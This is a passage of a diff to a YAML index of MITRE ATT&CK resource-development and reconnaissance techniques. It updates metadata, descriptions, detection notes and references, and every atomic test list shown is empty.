-          SunshopFireEye. Retrieved March 6, 2017.'
-        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.568Z'
       name: Obtain Capabilities
       description: |-
         Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -53677,22 +54292,66 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
       - 'Malware Repository: Malware Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+      created: '2020-10-01T01:56:24.776Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588
+        external_id: T1588
+      - source_name: PegasusCitizenLab
+        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+          Human Rights Defender. Retrieved December 12, 2016.'
+        url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+      - source_name: FireEyeSupplyChain
+        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+          SunshopFireEye. Retrieved March 6, 2017.'
+        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: NationsBuying
+        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1650:
     technique:
@@ -53755,37 +54414,38 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.007:
     technique:
-      modified: '2022-10-20T21:19:57.555Z'
+      modified: '2024-10-03T14:18:34.045Z'
       name: Serverless
       description: "Adversaries may compromise serverless cloud infrastructure, such
-        as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
-        By utilizing serverless infrastructure, adversaries can make it more difficult
-        to attribute infrastructure used during operations back to them. \n\nOnce
-        compromised, the serverless runtime environment can be leveraged to either
-        respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+        as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+        can be used during targeting. By utilizing serverless infrastructure, adversaries
+        can make it more difficult to attribute infrastructure used during operations
+        back to them. \n\nOnce compromised, the serverless runtime environment can
+        be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
         traffic to an adversary-owned command and control server.(Citation: BlackWater
-        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
-        by these functions will appear to come from subdomains of common cloud providers,
-        it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+        Apps Script Abuse 2021) As traffic generated by these functions will appear
+        to come from subdomains of common cloud providers, it may be difficult to
+        distinguish from ordinary traffic to these providers - making it easier to
+        [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
         Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
         Workers)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -53809,11 +54469,14 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.004:
     technique:
@@ -53871,17 +54534,18 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.006:
     technique:
-      modified: '2023-03-13T20:35:52.302Z'
+      modified: '2024-08-14T15:03:56.383Z'
       name: SEO Poisoning
       description: |-
         Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
 
         To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
 
+        In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
         Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
 
         SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -53889,7 +54553,7 @@ resource-development:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Vijay Lalwani
       - Will Thomas, Equinix Threat Analysis Center (ETAC)
       - Will Jolliffe
@@ -53903,7 +54567,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -53936,11 +54600,18 @@ resource-development:
         description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
           September 30, 2022.
         url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+      - source_name: Chexmarx-seo
+        description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+          the Star Ranking Game. Retrieved June 18, 2024.'
+        url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+      - source_name: Checkmarx-oss-seo
+        description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+          Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+        url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.003:
     technique:
@@ -53962,7 +54633,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:19:50.018Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -53980,47 +54651,10 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
-      type: attack-pattern
-      created: '2020-10-01T01:30:00.877Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1587
-        url: https://attack.mitre.org/techniques/T1587
-      - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
-        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
-          Units. Retrieved July 18, 2016.
-        source_name: Mandiant APT1
-      - source_name: Kaspersky Sofacy
-        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
-          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
-          December 10, 2015.
-        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
-      - source_name: Bitdefender StrongPity June 2020
-        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
-        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
-          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
-      - source_name: Talos Promethium June 2020
-        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
-        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
-          reach with StrongPity3 APT. Retrieved July 20, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:31:17.270Z'
       name: Develop Capabilities
       description: |-
         Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -54029,21 +54663,57 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
 
         Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+      created: '2020-10-01T01:30:00.877Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1587
+        external_id: T1587
+      - source_name: Kaspersky Sofacy
+        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+          December 10, 2015.
+        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Mandiant APT1
+        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+          Units. Retrieved July 18, 2016.
+        url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+      - source_name: Talos Promethium June 2020
+        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+          reach with StrongPity3 APT. Retrieved July 20, 2020.
+        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+      - source_name: Bitdefender StrongPity June 2020
+        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1588.005:
     technique:
@@ -54083,7 +54753,7 @@ resource-development:
         description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
           Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
           October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:14:01.255Z'
       name: Exploits
       description: |-
         Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54102,15 +54772,13 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.001:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-24T15:10:40.270Z'
       name: Domains
       description: |-
-        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
 
         Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
 
@@ -54118,19 +54786,19 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Jeremy Galloway
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.3'
-      x_mitre_contributors:
-      - Jeremy Galloway
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -54164,55 +54832,64 @@ resource-development:
         url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 reconnaissance:
   T1592:
     technique:
-      x_mitre_platforms:
-      - PRE
+      modified: '2024-10-03T19:35:07.269Z'
+      name: Gather Victim Host Information
+      description: |-
+        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: reconnaissance
+      x_mitre_contributors:
+      - Sam Seabrook, Duke Energy
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Internet Scan: Response Content'
       type: attack-pattern
+      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
       created: '2020-10-02T16:39:33.966Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1592
         url: https://attack.mitre.org/techniques/T1592
+        external_id: T1592
       - source_name: ATT ScanBox
-        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+      - source_name: TrellixQakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved August 1, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Gather Victim Host Information
-      description: |-
-        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
-        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: reconnaissance
-      x_mitre_detection: |-
-        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
-        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.1'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1596.003:
     technique:
@@ -54237,7 +54914,7 @@ reconnaissance:
         url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
         description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
           from Server (Site URL). Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:48:37.628Z'
       name: Digital Certificates
       description: |-
         Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -54253,8 +54930,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.002:
     technique:
@@ -54276,7 +54951,7 @@ reconnaissance:
         url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
         description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
           73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:44:43.900Z'
       name: Purchase Technical Data
       description: |-
